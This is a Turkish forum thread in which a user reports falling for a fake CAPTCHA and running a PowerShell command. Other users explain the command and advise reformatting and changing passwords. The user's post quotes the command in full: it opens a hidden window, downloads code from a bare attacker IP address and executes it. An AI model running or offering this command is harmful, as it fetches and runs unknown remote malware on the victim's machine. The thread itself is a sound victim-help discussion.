Sahte CAPTCHA doğrulaması yapıp Powershell komutu girdikten sonra ne yapılmalı?

te0kinegde · Dün 14:08

Beware of Fake CAPTCHA that Initiates Malware | Office of Technology and Digital Innovation
Ben yanlışlıkla bunu doğruladım ne yapacağım? WİN + R ye bunu yazdım;

powershell -w h -c iex(iwr -Uri 62.60.226.146 -UseBasicParsing)

DarkHacker · Dün 14:41

Bu satır incelediğimizde, şunu yaptığını görüyoruz:

powershell → Windows PowerShell’i açar
-w h → pencereyi gizli açar (sen görmezsin)
-c → komut çalıştırır
iwr -Uri 62.60.226.146 → o IP adresinden bir şey indirir
iex(...) → indirilen şeyi anında çalıştırır

Yani özetlersek şunu yapıyor: “Hiçbir şey sormadan, gizlice bir IP’den kod indir ve direkt çalıştır.”

Muhtemelen o ip adresinde bir rat, trojan, keylogger, loader, dropper VB bir şey var. Kodun içeriğini bilmiyoruz. Bu yüzden tek yapabileceğin şey "Format + Şifre Değişimi"

Şüpheli olma sebebi ise: alan adı yok, direk ip, HTTPS yok, Kodun ne olduğu görünmüyor, Gizli çalışıyor. + Bu şekilde bir robot doğrulama sistemi yok.

Beri2222 · Dün 15:04

DarkHacker dedi:
Bu satır incelediğimizde, şunu yaptığını görüyoruz:

powershell → Windows PowerShell’i açar

-w h → pencereyi gizli açar (sen görmezsin)

-c → komut çalıştırır

iwr -Uri 62.60.226.146 → o IP adresinden bir şey indirir

iex(...) → indirilen şeyi anında çalıştırır

Yani özetlersek şunu yapıyor: “Hiçbir şey sormadan, gizlice bir IP’den kod indir ve direkt çalıştır.”

Muhtemelen o ip adresinde bir rat, trojan, keylogger, loader, dropper VB bir şey var. Kodun içeriğini bilmiyoruz. Bu yüzden tek yapabileceğin şey "Format + Şifre Değişimi"

Şüpheli olma sebebi ise: alan adı yok, direk ip, HTTPS yok, Kodun ne olduğu görünmüyor, Gizli çalışıyor. + Bu şekilde bir robot doğrulama sistemi yok.

Doğru

benim anlamadığım şey bu arkadaş neden bilmeden böyle bir kod çalıştırmış

şuan senin modemine keylogger attı ise tüm cihazları elden geçirmek lazım hele modeme kalıcı bir rat attıysa işimiz zor.

Sahte CAPTCHA doğrulaması yapıp Powershell komutu girdikten sonra ne yapılmalı?

Ayrıntılı düzenleme

te0kinegde

Zeptopat

DarkHacker

Hectopat

Beri2222

Hectopat

Benzer konular

Bu konuyu görüntüleyen kullanıcılar

Technopat Haberler

Yeni konular

Yeni mesajlar

Gizliliğinize önem veriyoruz